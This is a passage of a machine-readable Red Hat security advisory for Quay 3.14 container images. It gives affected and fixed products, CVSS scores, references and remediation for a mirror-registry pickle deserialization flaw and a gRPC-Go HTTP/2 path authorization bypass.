          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-32590"
        },
        {
          "category": "external",
          "summary": "RHBZ#2446964",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446964"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-32590",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32590"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-32590",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32590"
        }
      ],
      "release_date": "2026-04-08T00:00:00+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-26T17:12:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11458",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:21017"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Moderate"
        }
      ],
      "title": "mirror-registry: remote code execution using pickle deserialization"
    },
    {
      "cve": "CVE-2026-33186",
      "cwe": {
        "id": "CWE-551",
        "name": "Incorrect Behavior Order: Authorization Before Parsing and Canonicalization"
      },
      "discovery_date": "2026-03-20T23:02:27.802640+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2449833"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in gRPC-Go, the Go language implementation of gRPC. This vulnerability, an authorization bypass, is caused by improper input validation of the HTTP/2 `:path` pseudo-header. A remote attacker can exploit this by sending raw HTTP/2 frames with a malformed `:path` that omits the mandatory leading slash. This allows the attacker to bypass defined security policies, potentially leading to unauthorized access to services or information disclosure.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "google.golang.org/grpc/grpc-go: google.golang.org/grpc/authz: gRPC-Go: Authorization bypass due to improper HTTP/2 path validation",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-33186"
        },
        {
          "category": "external",
          "summary": "RHBZ#2449833",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449833"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-33186",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-33186"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33186",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33186"
        },
        {
          "category": "external",
          "summary": "https://github.com/grpc/grpc-go/security/advisories/GHSA-p77j-4mvh-x3m3",
          "url": "https://github.com/grpc/grpc-go/security/advisories/GHSA-p77j-4mvh-x3m3"
        }
      ],
      "release_date": "2026-03-20T22:23:32.147000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-26T17:12:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11458",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:21017"
        },
        {
          "category": "workaround",
          "details": "To mitigate this issue, implement infrastructure-level normalization to ensure all incoming HTTP/2 `:path` headers are properly formatted with a leading slash before reaching the gRPC-Go server. This can be achieved by configuring a reverse proxy or API gateway to validate and normalize the `:path` header. Ensure that any such intermediary is properly configured and restarted to apply the changes, which may temporarily impact service availability.",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
